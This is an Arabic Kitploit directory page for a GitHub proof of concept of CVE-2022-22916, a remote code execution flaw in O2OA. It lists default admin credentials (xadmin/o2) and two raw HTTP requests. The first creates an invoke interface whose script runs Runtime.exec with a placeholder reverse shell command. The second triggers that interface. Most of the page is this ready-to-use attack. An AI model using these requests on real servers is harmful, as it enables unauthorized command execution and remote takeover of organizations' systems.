Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-22916 — CVE-2022-22916,O2OA RCE تنفيذ الأوامر عن بُعد | Kitploit
أدوات/GitHubGitHub/0x7eteam/cve-2022-22916
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHub0x7eteam/cve-2022-22916

CVE-2022-22916

CVE-2022-22916,O2OA RCE تنفيذ الأوامر عن بُعد

عرض المستودع
45منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-22916

CVE-2022-22916, O2OA RCE تنفيذ الأوامر عن بعد

O2OA RCE تنفيذ الأوامر عن بعد (CVE-2022-22916)

O2OA هو نظام أساسي للحلول المخصصة لتطوير أنظمة معلومات المؤسسات مفتوحة المصدر بموجب بروتوكول AGPL، يعتمد على بنية J2EE الموزعة، ويدمج العمل المكتبي المتنقل والعمل الذكي، ويدعم النشر الخاص، وقابل للتكيف مع أحمال العمل، ويمكنه إلى حد كبير تقليل تكاليف تطوير البرمجيات للمؤسسات. من خلال /x_program_center/jaxrs/invoke، تم اكتشاف أن O2OA v6.4.7 يحتوي على ثغرة تنفيذ كود عن بعد (RCE).

الخطوة الأولى:

تسجيل الدخول باستخدام xadmin/o2 الحصول على Authorization

الخطوة الثانية: إضافة الواجهة

root@kitploit:~
POST /x_program_center/jaxrs/invoke?v=6.3 HTTP/1.1
Host: 123.58.236.76:33455
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Authorization: 你的Authorization
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 475

{"name":"aodsec","id":"aodsec","alias":"","description":"","isNewInvoke":true,"text":"\nvar p = java.lang.Runtime.getRuntime().exec('反弹shell命令');\nvar sc = new java.util.Scanner(p.getInputStream(),\"GBK\").useDelimiter(\"\\\\A\");\nvar result = sc.hasNext() ? sc.next() : \"\";\nsc.close();","enableToken":false,"enable":true,"remoteAddrRegex":"","lastStartTime":"","lastEndTime":"","validated":true}

الخطوة الثانية: تنفيذ الأمر

root@kitploit:~
POST /x_program_center/jaxrs/invoke/aodsec/execute?v=6.3 HTTP/1.1
Host: 123.58.236.76:43953
Content-Length: 0
Accept: text/html,application/json,*/*
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN
Authorization: 你的Authorization
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Content-Type: application/json; charset=UTF-8
Origin: http://123.58.236.76:43953
Referer: http://123.58.236.76:43953/x_desktop/index.html
Accept-Encoding: gzip, deflate
Cookie:  
Connection: close
تنزيل الأداة